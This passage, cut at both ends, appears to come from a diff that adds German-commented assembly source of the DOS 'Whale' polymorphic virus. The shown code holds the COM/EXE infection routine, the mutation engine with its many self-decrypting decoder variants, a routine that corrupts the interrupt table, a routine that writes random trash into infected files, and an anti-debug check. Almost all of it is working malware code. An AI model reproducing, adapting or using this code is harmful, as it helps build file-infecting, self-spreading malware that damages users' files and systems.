) + CALL CS:[@INT21] + + XOR CX,CX ; Weils so schoen war ... 
+ MOV AX,4200h + XOR DX,DX + CALL CS:[@INT21] + + MOV CL,1Ch ; diesmal nach DS:0004 lesen + MOV AH,3Fh ; == CS:2814 + MOV DX,0004h + CALL CS:[@INT21] + + XOR CX,CX ; seek file-Ende + MOV AX,4202h + MOV DX,CX + CALL CS:[@INT21] + + MOV Word Ptr DS:[FileSize+2],DX ; FileSize merken + MOV Word Ptr DS:[FileSize ],AX + + MOV DI,AX ; BEISPIEL : AX=9273 -> DI=9273 + ADD AX,000Fh ; AX=9282 + ADC DX,+00h ; bertrag nach DX + AND AX,0FFF0h ; AX=9280 + SUB DI,AX ; DI=FFF3 + MOV CX,0010h ; CX=10 + DIV CX ; AX=928 = Anzahl Paras fr File + MOV SI,AX ; SI=928 + MCODE 57 + RETN +;===================================================================== +;=====================================================( Infektion )=== +;===================================================================== +Infect_File: MDECODE 58 +;***************************************** +JMP CODE_58 ;************************* e-i-n-g-e-f--g-t- +;***************************************** + + XOR CX,CX + MOV AX,4200h ; SEEK File-Anfang + MOV DX,CX ; CX=DX=0 + CALL CS:[@INT21] ; INT 21h + + MOV CL,1Ch ; 1C Byte + MOV AH,40h ; Write to File + + MOV DX,Offset CodBuf ; EXE-Header / COM-Start + CALL CS:[@INT21] ; INT 21h + + MOV AX,0010h + MUL SI ; AX = AX * maxparas + MOV CX,DX ; DX = Offset CodBuf + MOV DX,AX ; + MOV AX,4200h ; SEEK from start to CX:DX + CALL CS:[@INT21] ; INT 21h + + MOV CX,Offset CodBuf ; CX = CodBuf + XOR DX,DX ; DX = 0 + ADD CX,DI ; CX = Offset CodBuf+DI + + MOV AH,40h ; WRITE-FILE + + CALL Mutate_Whale ; Mutieren + + CALL @10_Prozent ; jedes 10. Mal Wal + ; zerstren + CALL Suche_Fish ; Jedes 4. Mal FISH.TBL + ; schreiben + + MOV BYTE Ptr DS:[InfectFlag],01h ; "habe infiziert" + MOV BYTE Ptr DS:[D2433],01h ; Verschlsseln, schreiben, + ; entschlsseln ! 
+ + PUSH BX + PUSH ES + + PUSH CS + POP ES + + MOV Word Ptr DS:[D2579],SI + + MOV SI,OFFSET J0491A - Offset VirStart + ;----------------------------------------------------- + ;----------------------------( Wal-Code zerstren )--- + ;----------------------------------------------------- + MOV BYTE Ptr DS:[SwapCode_5],0CCh ; 3259 , 0e8h + MOV BYTE Ptr DS:[SwapCode_2],0C6h ; 3A20 , 0e9h + MOV BYTE Ptr DS:[SWAPCODE_6],0CCh ; 2cff , 0c3h + ;----------------------------------------------------- + CALL Kill_Int_Table ; nur eine einzige Infektion +Code_58: MCODE 58 ; pro Session ! +;===================================================================== +;============================================( Zerstren des Wals )=== +;===================================================================== + CALL PATCH ; gepatchten code + ; zerstren + MOV SI,SWAPCODE_4 + XOR WORD Ptr DS:[SI],0EF15h ; PATCH zerstren + ADD SI,+02h + XOR WORD Ptr DS:[SI],4568h ; ---""----------- + MOV BYTE Ptr DS:[SwapCode_1],03Dh + ; DECODE zerstren + ;=====( eigentliche infektion )======================= + ;=========================; + CALL Code_Whale ; Whale kodieren ; + ; aber NICHT Lauffhig !! ; + ;=========================; + + ;-------------------------( und rckgngig machen )--- + MOV Byte Ptr DS:[SwapCode_1],0E9h + XOR WORD Ptr DS:[SI],4568h + SUB SI,+02h + XOR WORD Ptr DS:[SI],0EF15h + ADD SI,SwapCode_3 ; SI = 210Ah + CALL PATCH + ;===================================================== + MDECODE 59 + MOV SI,[D2579] + POP ES + POP BX + CALL Write_Trash_To_File + + MOV CX,WORD PTR DS:[FileTime] + + MOV AX,5701h ; SET FILEDATUM ! + MOV DX,WORD PTR DS:[FileDate] + TEST CH,80h ; Stunde > 16 ? 
+ JNZ J038C3 ; jmp, wenn nicht + OR BYTE PTR CS:[TrashFlag],00h + JNZ J038C3 ; TrashFlag = "1" :jmp + ADD CH,80h ; Stunde=Stunde-16 +J038C3: CALL CS:[@INT21] ; Set Filedatum +CODE_59: + MCODE 59 + RETN +;===================================================================== +;===========================( Den Whale-Code zerstren , bei der )=== +;===========================( Infektion jedes 10. COM-Files )=== +;===========================( Zweck : Geburtenkontrolle ! )=== +;===================================================================== +@10_Prozent: MDECODE 60 + CALL PushALL + MOV BYTE PTR CS:[TrashFlag],00h + OR BYTE Ptr CS:[Offset Exe_Flag-Offset VirStart],0 + JNZ J0390E ; Jmp, wenn EXE-File + + IN AL,40h + CMP AL,19h ; 90 % liegen ber 19h + JNB J0390E ; fertig, nichts weiter tun +;-------------------------------------( Wal zerstrt seinen Code )--- + INC BYTE PTR CS:[TrashFlag]; ist jetzt "1" + MOV BX,000Ah + MOV CX,0016h + +J038F4: IN AL,40h + MOV CS:[BX],AL ; 16h Byte von CS:281A..2830 + INC BX ; durch Zufallszahlen berschreiben + LOOP J038F4 + IN AL,40h + MOV BYTE PTR CS:[0001h],AL ; dito den JMP bei CS:2811 + IN AL,40h + MOV BYTE PTR CS:[0002h],AL + IN AL,40h + MOV BYTE PTR CS:[0003h],AL + +J0390E: CALL PopALL + MCODE 60 + RETN +;---------------------------------------------------- +J03916: DB 0E9H,09Dh,0F2H ;JMP J02BB6 => Nirwana +;-------------------------------------------------------------------- +;------------------------------------------------------( Hmmmmm ) --- +;-------------------------------------------------------------------- +J03919: ; JZ J03916 ; => Nirwana ! + MOV DX,DS ; DX <- DS + POP AX ; AX = 20h + ADD DX,+10h ; DX = DS:100 + MOV DS,DX ; DS = DX + MOV BX,[BX] ; BX:=0030:011C, DAS IST DER + NEG BX ; TASTATURPUFFER ( 40:1C) ! 
+ ADD BX,CX ; es testet den Tastaturpuffer +;******************************************************************** + CMP BX,BX ;**** EINGEFGT ************* +;******************************************************************** + JNZ J03936 ; dann direkt in die Dekode-Routine + ; mit SI als Returnadresse + JZ J03990 ; sonst "decode" scharfmachen + ;-------------------------------------------------( trash )--- + DW 00A72h + DW 00B73H + DW 0FEE9H + DW 0E9F2h + DW 43H + ;------------------------------------------------------------- +J03936: JMP J02B87 ; = push si, jmp decode + +;--------------------------------------------------------------------- + DB 0e9h,06dh,0ah,0e9h,0a4h,0fch +;===================================================================== +;========================================( Schreibt Mll in Datei )=== +;===================================================================== +Write_Trash_To_File: + MDECODE 61 + CALL PushALL + OR BYTE PTR CS:[TrashFlag],00h + JZ J0396A ; falls "0" nichts tun + + XOR AX,AX + IN AL,40h + MOV DS,AX + + MOV DX,0400h ; DX = 400h + + IN AL,40h + XCHG AH,AL + IN AL,40h + MOV CX,AX + AND CH,0Fh ; CX = 0xxxh + MOV AH,40h ; WRITE File + + CALL CS:[@INT21] + +J0396A: CALL PopALL + MCODE 61 + RETN +;---------------------------------------------------------( trash )--- + DB 0b9h,01ch,000h,089H + DB 0d7h,0B3h,000h,0e8H +;========================================================()=========== +J0397A: MDECODE 62 + CALL SaveRegisters + MOV DI,DX + ADD DI,+0Dh + PUSH DS + POP ES + MCODE 62 + JMP J039EC ; ist die Datei ausfhrbar ? 
+;===================================================================== +;===========================================( Decode scharfmachen )=== +;===================================================================== +J03990: MOV BYTE PTR CS:[SI+SwapCode_1],0E9h; JMP erzeugen + JMP J03A1C + DB 0EAh +;===================================================================== +;======================================( zerstrt die INT-Tabelle )=== +;===================================================================== +Kill_Int_Table: + MDECODE 63 + CALL PushALL + MOV BX,23F1h ; 4C01 + MOV CX,000Eh ; CX = 0Eh + PUSH AX + MOV AX,0000h + MOV ES,AX ; ES = 0000 + POP AX + +J039AF: IN AX,40h ; Hole zufallszahl + MOV SI,AX + PUSH ES:[SI] ; zerstoere INT-Tabelle + POP [BX] ; durch 14 Zufalls-Werte ! + INC BX ; Die in [bx] gemerkt werden + LOOP J039AF + CALL PopALL + MCODE 63 + RETN +;===================================================================== +;===================================( check auf ausfhrbare Datei )=== +;===================================================================== +J039C3: MDECODE 64 + CALL SaveRegisters + PUSH DS + POP ES + MOV CX,0050h + MOV DI,DX + MOV BL,00h + XOR AX,AX + CMP BYTE Ptr DS:[DI+01h],':' ; Laufwerk im Filenamen ? 
+ JNZ J039E1 + MOV BL,[DI] ; Ja, dann Buchstabe nach BL + AND BL,1Fh ; HEX-ZAHL drausmachen +J039E1: MOV CS:[D2428],BL ; und in die DRIVE-Variable + REPNZ SCASB ; ENDE des Filenamens suchen + MCODE 64 +;--------------------------------------------------------------------- +;---------------------------------( Erkennung der Datei-Extension )--- +;--------------------------------------------------------------------- +J039EC: MDECODE 65 + MOV AX,[DI-03h] ; ENDE - 3, ist EXTENSION + AND AX,0DFDFh ; Gross-Schrift + ADD AH,AL + MOV AL,[DI-04h] + AND AL,0DFh ; Gross-schrift + ADD AL,AH + MOV BYTE PTR CS:[EXE_FLAG],00h +;--------------------------------------------------------------------- +;------------( Angenommen, es war ein COM, dann gilt : )------------- +;------------( AND AX,0DFDF : AX = 4D4F / 'MO' )------------- +;------------( ADD AH,AL : AX = 9C4F )------------- +;------------( MOV AL,[Di-4]: AX = 9C43 / 'xC' )------------- +;------------( ADD AL,AH ; AX = 9CDF )------------- +;--------------------------------------------------------------------- +;------------( BEI EXE kommt AL=E2 heraus, bei COM AL=DF)------------- +;--------------------------------------------------------------------- + CMP AL,0DFh ; Also : IST ES EIN COM ? + MCODE 65 +J03A0C: JZ J03A17 + INC BYTE PTR CS:[EXE_FLAG] + CMP AL,0E2h ; Also : IST ES EIN EXE ? 
+ JNZ J03A23 ; Weder COM noch EXE +J03A17: CALL GetRegsFromVirstack ; COM oder EXE + CLC ; Carry-Flag lschen + RETN +;===================================================================== +;====================================( JMP wird zeitweise erzeugt )=== +;====================================( Einziger JMP zum Relokator )=== +;===================================================================== +J03A1C: XOR AX,AX + PUSH ES + POP DS +J03A20: JMP Relokator +;===================================================================== +J03A23: CALL GetRegsFromVirstack ; Weder COM noch EXE +J03A26: STC ; Carry-Flag setzen + RETN + DB 2Dh +;===================================================================== +;===============================================( Get current PSP )=== +;===================================================================== +GET_Current_PSP:MDECODE 66 + PUSH BX + MOV AH,51h + CALL CS:[@INT21] + MOV CS:[@PSP],BX + POP BX + MCODE 66 + RETN +;===================================================================== +;==========================(--------------------------------------)=== +;==========================( HIER ENTSTEHEN DIE MUTANTEN ! )=== +;==========================(--------------------------------------)=== +;===================================================================== +Mutate_Whale: MDECODE 67 + CALL PushALL ; AH = 40h ! + OR BYTE PTR CS:[InfectFlag],00h ; Hab schon infiziert ! + JNZ J03A7C + + IN AL,40h ; Zufallszahl holen + CMP AL,80h ; nur jedes 2 Mal arbeiten + +J03A55: JB J03A7C + CALL Decode_3A84 ; Bereich 3A84h...436Ch + +J03A5A: IN AL,40h ; Zufallszahl holen + CMP AL,1Eh ; kleiner als 1eh / 30d + JNB J03A5A + + XOR AH,AH + MOV BX,M_SIZE + MUL BX ; Zufallszahl * 4Ch / 76d + ; AX : 0000....08E8 + ADD AX,Offset J03A84-Offset VirStart + ; AX : 1274....1B5C + + PUSH CS + PUSH CS + POP DS + POP ES ; ES=DS=CS + + ;====================== + MOV SI,AX ; Quelle : 1274....1B5C + ; bzw. 3A84....436C + ; in Stcken zu 4Ch !!! 
+ ;====================== + MOV DI,Offset D4BB5-Offset VirStart + MOV CX,M_SIZE ; 4C Byte von CS:SI + ; nach CS:23A5/4BB5 + ; schaufeln + CLD + REPZ MOVSB + CALL Code_3A84 ; Bereich 3A84h...436Ch + +J03A7C: CALL PopALL + MCODE 67 + RETN + +;=================================( dieser Code steht immer davor )=== +;Code_Whale: PUSH CX +; PUSH BX +; MOV BX,FirstByte +; MOV CX,Code_len ; 2385h ; Wal-Size bis J04BB5 +;===================================================================== +; Die Nummerierung der Mutanten folgt dem TBSCAN.DAT-File +;===================================================================== +;=====================================================( MUTANT # 3)=== +;===================================================================== +MUT_3 EQU $ +J03A84: STD ; = OFFSET 4BB5 + MOV CX,DreiByte ; 0BD8h +J03A88: XOR WORD Ptr DS:[BX],1326h + ADD BX,+03h + LOOP J03A88 + + MOV CX,BX + POP CX + MOV BX,CX + POP CX + MOV AH,60h + JMP SHORT J03AB8 + ;--------( einsprung ) ---------( -1131 )------------ +J03A9B: PUSH SI ; = 4BCC, SI = 100h + CALL J03AA1 ; + + DW 6945h ; 4BD0 + +J03AA1: POP DX ; DX = 4BD0 + PUSH CS + SUB DX,23A0H ; DX = 2830 + + POP DS + MOV CX,DreiByte ; CX = 0BD8 + XCHG DX,SI ; DX = 100h, SI = 2830 +J03AAD: XOR WORD Ptr DS:[SI],1326h + ADD SI,+03h + LOOP J03AAD + JMP SHORT J03AC0 ; SI = 4BB8 + ;---------------------------------------------------- +J03AB8: SUB AH,20h ; => AH = 40, WRITE FILE + ;----------------( db-code )------------------------- + Call_int21 3,MUT_3 + ;---------------- + JMP J03A9B + ;---------------------------------------------------- +J03AC0: SUB SI,Offset D4BB5-4C40H ; SI = SI + 8Bh = 4C43h/D2433 + CMP BYTE Ptr DS:[SI],01h + JNZ J03ACB + POP SI ; originales SI vom Stack + RETN + +J03ACB: PUSH ES + POP DS + ;---------------- +J03ACD: JMP_entry 3,mut_3 + ;---------------- +;===================================================================== +;=====================================================( MUTANT #5 )=== 
+;===================================================================== +MUT_5 EQU $ +J03AD0: MOV CX,0BD7h ; CX = 0bd7 ; = OFFSET 4BB5 +J03AD3: XOR WORD Ptr DS:[BX],4096h ; also 11c3 mal, da BX um 3 + ; erhht wird + ADD BX,+03h + LOOP J03AD3 + MOV AX,ES + POP AX + MOV BX,AX + POP CX + MOV AH,50h + JMP SHORT J03B04 + +J03AE6: PUSH SI + ;--------( einsprung ) ------ +J03AE7: STD + CALL J03AED + PUSH CS + DEC DI +J03AED: POP DX ; DX = + PUSH CS + SUB DX,23A0h ; DX = + POP DS + MOV CX,0BD7h ; CX = + XCHG DX,SI ; SI = + +J03AF9: XOR WORD Ptr DS:[SI],4096h + ADD SI,+03h + LOOP J03AF9 + JMP SHORT J03B0C ; SI = + + +J03B04: SUB AH,10h ; AH = 40h ! + CALL_INT21 5,MUT_5 + JMP J03AE6 + +J03B0C: SUB SI,0FF72h ; SI = + CMP BYTE Ptr DS:[SI],01h + JNZ J03B17 + POP SI + RETN + +J03B17: PUSH ES + POP DS +J03B18: JMP_ENTRY 5,mut_5 +;===================================================================== +;===================================================( MUTANT # 20 )=== +;===================================================================== +MUT_20 EQU $ + CMC ; = OFFSET 4BB5 + CALL J03B61 ; CX = 11C3 +J03B20: XOR WORD Ptr DS:[BX],0406h + INC BX + ADD BX,+01h + CMC + LOOP J03B20 + POP BX + CMC + POP CX + CALL_INT21 20,MUT_20 + PUSH AX + POP AX + ;--------( einsprung ) ------ + CALL J03B5E ; DS <- 4BCF + + MOV BX,CS + PUSH BX + MOV BX,DS ; BX <- DS, BX = 4BCF ! + POP DS ; DS=CS + ADD BX,0DC61h ; BX = 2830 + CALL J03B61 ; CX = 11C3 + MOV DX,0002h ; DX = 2 +J03B46: XOR WORD Ptr DS:[BX],0406h + ADD BX,DX + LOOP J03B46 + ; BX = 4BB6 + ADD BX,008Dh ; BX = 4C43 / 2443 + PUSH [BX] ; [BX]=[2443] ???????? + POP CX ; CX = ? + DEC CL ; CX = ? 
+ JZ J03B60 ; + PUSH ES + POP DS + CALL_ENTRY 20,mut_20 + +J03B5E: POP DS + PUSH DS +J03B60: RETN + +J03B61: MOV CX,1100h + OR CL,0C3h ; CX = 11C3 + RETN +;===================================================================== +;===================================================( MUTANT # 21 )=== +;===================================================================== +MUT_21 EQU $ + CALL J03BAE ; CX = 11C3 +J03B6B: XOR WORD Ptr DS:[BX],239Ah + ADD BX,+01h + CLC + INC BX + LOOP J03B6B + + POP BX + CLD + POP CX + CALL_INT21 21,MUT_21 + PUSH DX + INC DX + POP DX + ;--------( einsprung ) ------ + CALL J03BAB ; DS <- 4BCF + MOV BX,CS + PUSH BX + MOV BX,DS ; BX = 4BCF + POP DS ; DS = CS + ADD BX,0DC61h ; BX = 2830 + CALL J03BAE ; CX = 11C3 + MOV AX,0002h ; AX = 0002 + +J03B92: XOR WORD Ptr DS:[BX],239Ah + NOP + ADD BX,AX + LOOP J03B92 + + ADD BX,008Dh ; BX = 4BB6 + PUSH [BX] + POP BX + DEC BL ; CMP byte Ptr DS:[4C43],1 + JZ J03BAD + PUSH ES + POP DS + CALL_ENTRY 21,mut_21 + ;------------------- +J03BAB: POP DS + PUSH DS +J03BAD: RETN + +J03BAE: MOV CX,0C311h ; MOV CX,11C3 + XCHG CH,CL ; RET + RETN +;===================================================================== +;===================================================( MUTANT # 22 )=== +;===================================================================== +MUT_22 EQU $ + CALL J03BF9 ; CX = 11C3 +J03BB7: XOR WORD Ptr DS:[BX],0138h + ADD BX,+02h + LOOP J03BB7 + POP BX + CLC + POP CX + CALL_INT21 22,MUT_22 + JMP SHORT J03BCB + + DB 23h,87h,0ch + ;--------( einsprung ) ------ +J03BCB: CALL J03BF6 ; DS <- + + MOV BX,CS + PUSH DS ; DS = CS + MOV DS,BX + POP BX ; BX = + SUB BX,239Fh ; BX = + CALL J03BF9 ; CX = 11C3 + MOV AX,0002h ; AX = 0002 + +J03BDE: XOR WORD Ptr DS:[BX],0138h + ADD BX,AX + LOOP J03BDE + ADD BX,008Dh ; BX = + PUSH [BX] + POP BX + DEC BL ; + JZ J03BF8 + PUSH ES + POP DS + JMP_ENTRY 22,mut_22 + +J03BF6: POP DS + PUSH DS +J03BF8: RETN + +J03BF9: MOV CX,0C311h ; MOV CX,11C3 + XCHG CL,CH ; RET + RETN + + DB 
0CCh +;===================================================================== +;===================================================( MUTANT # 23 )=== +;===================================================================== +MUT_23 EQU $ + XCHG CL,CH ; = OFFSET 4BB5 + XOR CX,94E0h ; CX=2385 -> 8523 -> 11c3 +J03C06: INC BX + ADD WORD Ptr DS:[BX],00FEh + INC BX + LOOP J03C06 + MOV AX,DX + POP DX + MOV BX,DX + POP CX + PUSH AX + JMP SHORT J03C42 + + ;--------( einsprung ) ------ +J03C17: CALL J03C1B +J03C1A: RETN + +J03C1B: MOV BX,0DC61h ; BX = + POP CX ; CX = + ADD BX,CX ; BX = + PUSH CS + MOV CX,11C4h ; CX = + POP DS ; DS = + DEC CL ; CX = 11C3 +J03C28: INC BX + SUB WORD Ptr DS:[BX],00FEh + INC BX + LOOP J03C28 + PUSH SI ; BX = + MOV SI,BX ; SI = + ADD SI,008Dh ; SI = + DEC BYTE Ptr DS:[SI] ; + POP SI + JZ J03C1A + PUSH ES + CLC + POP DS + JMP_ENTRY 23,mut_23 + +J03C42: POP DX + MOV AL,40h + XCHG AH,AL ; AH = 40h !!!!!!! +J03C47: + CALL_INT21 23,MUT_23 + JMP J03C17 +END_23: +;===================================================================== +;===================================================( MUTANT # 27 )=== +;===================================================================== +MUT_27 EQU $ + SUB CH,12h ; = OFFSET 4BB5 + ADD CL,3Eh ; cx=2385 -> 11c3 +J03C52: ADD [BX],CX + ADD BX,+04h + SUB BX,+02h + LOOP J03C52 + XCHG BP,BX + POP BP + XCHG BX,BP + JMP SHORT J03C8D + + ;--------( einsprung ) ------ +J03C63: CALL J03C67 +J03C66: RETN + +J03C67: POP CX + MOV BX,0DC61h + ADD BX,CX + PUSH CS + MOV CX,10C3h + POP DS + INC CH +J03C74: SUB [BX],CX + INC BX + STC + INC BX + LOOP J03C74 + MOV BP,BX + ADD BP,008Dh + DEC BYTE PTR [BP+00h] + POP BP + JZ J03C66 + PUSH ES + POP DS + JMP_ENTRY 27,mut_27 + +J03C8D: POP CX + PUSH BP + MOV BP,2567h + INC BP + +J03C93: + + CALL DS:BP + JMP J03C63 +;===================================================================== +;===================================================( MUTANT # 24 )=== 
+;===================================================================== +Mut_24 EQU $ + ADD CX,0EE3Eh ; = OFFSET 4BB5 + JMP SHORT J03CA7 + db 43h +J03C9F: NEG WORD Ptr DS:[BX] + ADD BX,+02h + LOOP J03C9F +J03CA6: RETN + +J03CA7: CALL J03C9F + CALL J03CCE + + DB 0EAH + DB 12H + + ;--------( einsprung ) ------ +J03CAF: PUSH AX + CALL J03CDD + ADD DX,0DC60h + MOV CH,11h + MOV CL,0C3h + XCHG BX,CX + CALL J03C9F + TEST BYTE Ptr DS:[D2433],0FEh + JZ J03CA6 + MOV CX,ES + MOV DS,CX + CALL_ENTRY 24,mut_24 + ;------------------- +J03CCE: POP CX + POP AX + XCHG AX,BX + POP AX + XCHG AX,CX + MOV AH,3Fh + INC AH + CALL_INT21 24,mut_24 + POP AX + JMP J03CAF + +J03CDD: MOV BX,CS +J03CDF: MOV DS,BX + POP DX + PUSH DX + RETN +;===================================================================== +;====================================================( MUTANT # 28)=== +;===================================================================== +mut_28 EQU $ + XOR CX,3246h ; = OFFSET 4BB5 + JMP SHORT J03CF3 + +J03CEA: XOR [BX],CX + ADD BX,+03h + DEC BX + LOOP J03CEA +J03CF2: RETN + +J03CF3: CALL J03CEA + CALL J03D18 +J03CF9: XCHG BL,BH + ;--------( einsprung ) ------ + CALL J03D29 + XCHG DX,BX + ADD BX,0DC61h + MOV CX,ZweiByte + CALL J03CEA + TEST BYTE Ptr DS:[D2433],0FEh + JZ J03CF2 + MOV DX,ES + MOV DS,DX + JMP_ENTRY 28,mut_28 + +J03D18: POP AX + POP AX + MOV BX,AX + POP AX + MOV CX,AX + XOR AH,AH + OR AH,40h ; AH = 40h + CALL_INT21 28,mut_28 + JMP J03CF9 + +J03D29: MOV BX,CS +J03D2B: MOV DS,BX + POP DX + PUSH DX + RETN +;===================================================================== +;====================================================( MUTANT # 26)=== +;===================================================================== +mut_26 EQU $ + SUB BX,+02h ; = OFFSET 4BB5 + ADD CX,0EE3Ch + MOV AX,[BX] +J03D39: INC BX + INC BX + SUB [BX],AX + LOOP J03D39 + POP BX + XLAT ; MOV AL,[BX+AL] + POP CX + JMP SHORT J03D6C + +J03D44: POP BX + PUSH BX +J03D46: RETN + + ;--------( einsprung ) 
------ +J03D47: PUSH CS + POP DS + CALL J03D44 + ADD BX,0DC5Dh + MOV CX,11C1h + MOV AX,[BX] +J03D55: INC BX + INC BX + ADD [BX],AX + LOOP J03D55 + ADD BX,0092h + CMP BYTE Ptr DS:[BX+01h],01h + JZ J03D46 + PUSH ES + AND AX,CX + POP DS + CALL_ENTRY 26,mut_26 + ;------------------- +J03D6C: MOV AH,30h + ADD AH,10h + + PUSH SI + MOV SI,1466h + CALL [SI+1100h] ; CALL INT 21h + POP SI + JMP J03D47 + +;===================================================================== +;=====================================================( MUTANT #1 )=== +;===================================================================== +MUT_1 EQU $ + SUB CX,11C4h ; = OFFSET 4BB5 + SUB BX,+02h + MOV AX,[BX] +J03D85: INC BX + INC BX + SUB [BX],AX + LOOP J03D85 + POP BX + POP CX + JMP SHORT J03DB9 + +J03D8F: POP BX + CLD + PUSH BX +J03D92: RETN + ;--------( einsprung ) ------ +J03D93: PUSH CS + POP DS + CALL J03D8F ; BX = +J03D98: SUB BX,23A3h ; BX = + MOV CX,11C1h ; CX = + MOV DX,[BX] +J03DA1: INC BX + INC BX + ADD [BX],DX + LOOP J03DA1 + PUSH BP + MOV BP,0433h + CMP BYTE PTR [BP+2000h],01h ; [2433] + POP BP + JZ J03D92 ; AUSGANG ! + PUSH ES + POP DS + CALL_ENTRY 1,mut_1 + ;----------------- +J03DB9: MOV AH,20h + ADD AH,AH ; AH = 40h => Schreiben !!!!!! + + MOV BP,2466h + CALL CS:[BP+0100h] ; CALL Int 21h ! + JMP J03D93 + DB 89H + +;===================================================================== +;====================================================( MUTANT #17 )=== +;===================================================================== +MUT_17 EQU $ + xor ax,ax ; = OFFSET 4BB5 + ADD CX,BX +J03DCC: MOV AL,[BX] + SUB [BX-01],AL + SUB BX,+02h + CMP BX,+1Fh + JNZ J03DCC + POP BX + CLD + POP CX + CALL J03E04 ; = JMP 3E04 + ;--------( einsprung ) ------ +J03DDF: PUSH CS + STD + POP DS + POP AX ; AX = + CALL J03E11 ; AX = + XCHG AX,BX ; BX = + MOV CX,ZweiByte ; CX = + SUB BX,+1Eh ; BX = + +J03DED: MOV DL,[BX] + ADD [BX-01h],DL + DEC BX ; (!!!!!) 
+ CMC + DEC BX + LOOP J03DED + ; BX = + CMP BYTE Ptr DS:[D2433],01h + JZ J03E13 + PUSH ES + CMC + POP DS + CALL_ENTRY 17,mut_17 + +J03E04: POP AX + XOR AH,AH + OR AH,40h ; AH = 40h, SCHREIBEN + + CALL DS:[@INT21] ; CALL INT 21h + CALL J03DDF +J03E11: POP AX + PUSH AX +J03E13: RETN +;===================================================================== +;====================================================( MUTANT # 16)=== +;===================================================================== +MUT_16 EQU $ + ADD BX,CX ; = OFFSET 4BB5 + MOV CX,0001h + INC CX ; CX = 2 +J03E1A: MOV AL,[BX] + ADD [BX-01h],AL + SUB BX,CX + CMP BX,+1Fh + JNZ J03E1A + POP BX + POP CX + CALL J03E4F + ;--------( einsprung ) ------ +J03E2B: POP BX ; BX = + PUSH CS + POP DS + CALL J03E5C ; AX = + + XCHG AX,BX ; AX = + SUB BX,+1Dh ; BX = + MOV CX,ZweiByte ; CX = + +J03E38: MOV AL,[BX] + SUB [BX-01h],AL + DEC BX + DEC BX + LOOP J03E38 + ; BX = + CMP BYTE Ptr DS:[D2433],01h + JZ J03E5E + PUSH ES + SUB AX,AX + POP DS + CALL_ENTRY 16,mut_16 +;---------------------------------------------------------------------- +J03E4F: POP AX + MOV AH,40h ; AH = 40h + + PUSH SI + MOV SI,Offset @INT21+2 ; Schreiben ? Int 21h ? 
+J03E56: CALL SI + POP SI + CALL J03E2B +J03E5C: POP AX + PUSH AX +J03E5E: RETN + DB 0ebh +;===================================================================== +;===================================================( MUTANT # 18 )=== +;===================================================================== +mut_18 EQU $ +J03E60: NOT BYTE Ptr DS:[BX] ; = OFFSET 4BB5 + NEG BYTE Ptr DS:[BX] + ADD BX,+01h + LOOP J03E60 + POP BX + CLD + POP CX + CALL_INT21 18,mut_18 + JMP SHORT J03E78 + +J03E71: MOV DX,CS + MOV DS,DX + CALL J03E7B + ;--------( einsprung ist $-1 )------- + ; ADD BH,DL + ; JMP J03E71 + ;------------------------------------- + +J03E78: XLAT ; MOV AL,[BX+AL] + JMP J03E71 + +J03E7B: POP DX ; DX = + SUB DX,239Dh ; DX = + STC + XCHG BX,DX ; BX = + MOV CX,CODE_LEN XOR 0F0FH ; CX = + CLC + XOR CX,0F0Fh ; CX = +J03E8B: NEG BYTE Ptr DS:[BX] + NOT BYTE Ptr DS:[BX] + INC BX + STD + LOOP J03E8B + ; BX = + MOV CH,8Dh ; CX = + MOV AL,01h + ADD AL,CH ; + XLAT ; MOV AL,[BX+AL] ; AL = [] + CLC + CMP AL,01h + JZ J03E56 ;-<<>>--< ZEIGT AUF L0L0L0 >-----<<>>-- + + MOV CX,ES + MOV AX,SS + + SUB AX,AX ; AX <- 0 + PUSH DS + MOV DS,CX ; DS <- ES + POP CX ; CX <- DS + JMP_ENTRY 18,mut_18 +;===================================================================== +;====================================================( MUTANT #30 )=== +;===================================================================== +Mut_30 EQU $ +J03EAC: NEG BYTE Ptr DS:[BX] ; = OFFSET 4BB5 + NOT BYTE Ptr DS:[BX] + INC BX + LOOP J03EAC + POP CX + POP BX + XCHG CX,BX + CALL_INT21 30,mut_30 + JMP SHORT J03EC3 + +J03EBC: MOV AX,CS + MOV DS,AX + CALL J03EC5 ; + ;-------( einsprung )-------------- +J03EC3: JMP J03EBC + +J03EC5: POP AX ; AX = + SUB AX,239Ch ; AX = + XCHG AX,BX ; BX = + + MOV CX,CODE_LEN XOR 0FDABH ; + XOR CX,0FDABh ; CX = 2385 + +J03ED1: NOT BYTE Ptr DS:[BX] + NEG BYTE Ptr DS:[BX] + INC BX + LOOP J03ED1 + ; BX = + MOV AL,8Eh + XLAT ; MOV AL,[BX+AL]; AL = [] + CMP AL,01h + JZ J03EF2 + MOV AX,ES + MOV 
BX,AX ; BX <- ES
+ PUSH DS
+ MOV DS,BX ; DS <- ES
+ POP BX ; BX <- DS
+ SUB AX,AX ; AX <- 0
+ JMP_ENTRY 30,mut_30
+
+;--------------------------------------------------------
+ Dw 8903h,0A5EFh,0CC14H
+J03EF2: RET
+ dw 0c111h,0b4deh
+;=====================================================================
+;=====================================================( MUTANT # 8)===
+;=====================================================================
+mut_8 EQU $
+ PUSH BP ; = OFFSET 4BB5
+ INC BX
+ DEC CX
+ CALL J03F06
+J03EFE: DEC CX
+ NEG BYTE Ptr DS:[BX]
+ ADD BX,+02h
+ DEC CX
+J03F05: RETN
+
+J03F06: POP BP ; BP =
+J03F07: CALL J03EFE
+ JZ J03F3C
+ JMP J03F07
+
+J03F0E: PUSH BP
+ ;-------( einsprung )--------------
+ PUSH CS
+J03F10: CLC
+ POP DS ; DS = CS
+ CALL J03F38 ; BP = OFFSET $+3
+J03F15: MOV CL,84h ; CX = xx84
+ SUB BP,23A1h ; BP = 2831
+ MOV BX,BP ; BX = 2831
+ MOV CH,23h ; CX = 2384
+J03F1F: CALL J03EFE
+ JNZ J03F1F ; = LOOP 3F1F
+
+ MOV AX,BP ; AX=BP=2831
+ MOV BP,BX ; BX=4C00
+ ADD BP,008Eh ; BP=
+ DEC BYTE PTR [BP+00h] ;
+ POP BP ; BP=egal
+ JZ J03F05 ; = RET
+ PUSH ES
+ POP DS
+ PUSH AX ; AX=2831
+ MOV AX,CX ; AX = 0
+J03F38: POP BP ; BP=2831
+ PUSH CS
+ PUSH BP
+ RETF ; JMP FAR CS:2830
+
+J03F3C: POP BP
+ POP BX
+ POP CX
+ CALL_INT21 8,mut_8
+ JMP J03F0E
+;=====================================================================
+;=====================================================( MUTANT #7 )===
+;=====================================================================
+Mut_7 EQU $
+ INC BX ; = OFFSET 4BB5
+ PUSH DX
+ DEC CX
+J03F47: CALL J03F52
+J03F4A: NOT BYTE Ptr DS:[BX]
+ DEC CX
+ ADD BX,+02h
+ DEC CX
+ RETN
